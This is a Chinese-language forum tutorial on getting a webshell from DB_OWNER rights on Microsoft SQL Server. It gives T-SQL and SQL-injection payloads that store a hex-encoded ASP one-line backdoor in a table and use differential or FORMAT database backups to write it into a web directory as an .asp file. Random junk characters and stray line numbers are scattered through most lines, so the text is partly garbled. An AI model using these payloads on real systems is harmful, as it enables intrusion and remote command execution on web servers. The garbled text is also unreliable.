DB_OWNER权限得到webshell的两点改进:. i0 R& }+ {" D' f7 R7 j: l' K% Y
$ n4 H1 p0 g) @: q0 I# g减少备份文件大小,得到可执行的webshell成功率提高不少
! k E2 j% E' c' X( ^; X一利用差异备份
" E; f: K4 i9 f2 g1 ]* x加一个参数WITH DIFFERENTIAL
" n0 d$ }) M" [/ D6 I( q3 s/ a& a6 H" M2 m' ]/ l: ^. d
12 y D0 z4 g; I4 y+ g) X$ o
2$ o' T: E5 i( S, N, P+ d" d
3
. i; Z" p& Q# j/ X1 R6 U4. c0 I7 I2 m1 k& t. n' P( m$ t
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
& k# I* L& `' lcreate table [dbo].[xiaolu] ([cmd] [image]);' U0 O) F. c+ q1 c! L" O+ Z
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
; s* d! d- Z( U( d/ Mdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL 3 s1 `4 x' a( e }1 v+ D4 q
; y: N3 @2 o$ g- \; k' [3 O二利用完全FORMAT2 D( J1 C- A! @1 f$ t& _
加一个参数WITH FROMAT. M, e# o, e) L
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
4 h& I) S2 r$ A5 @2 C' `+ R" l; `; X
* Z& G0 J7 |/ W7 U1! d9 g( p3 E5 ]
2
' w& ]1 a4 d& k _; ^& u3
: o( w( ], [( _- d$ h4
4 P* K) n2 j+ C' A$ ]9 H& c declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
9 T$ D! n) X0 ycreate table [dbo].[xiaolu] ([cmd] [image]);
8 X. }/ | c# g4 }) b. Q l4 E. ~insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)# @* O" s7 ~& Q5 o- v
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
* W: w$ }# s* F9 {" d" S4 k) ]. j$ r6 a$ f4 j6 `& u# I
总的来说就是那么简单几句,下面以备份数据库model为例子) f* Q- Q9 u S0 R H
1
5 `0 O# Y1 F% \$ L# S5 n
( C. N: {# u( F0 w1
" B9 e2 ~) F# W2 \* B# ~ X id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
' P' P* R4 e+ H! `: b6 L ~& ]2 A3 ?+ u
2
9 E; r- e! d! J& z2 O" z, P, p9 \. B: f' _3 W7 o
1: X5 V2 ?5 X4 p% g+ e
id=1;backup database model to disk='你的路径‘ with differential,format;-- & a0 L1 d' w5 j9 Z3 \, b+ \
|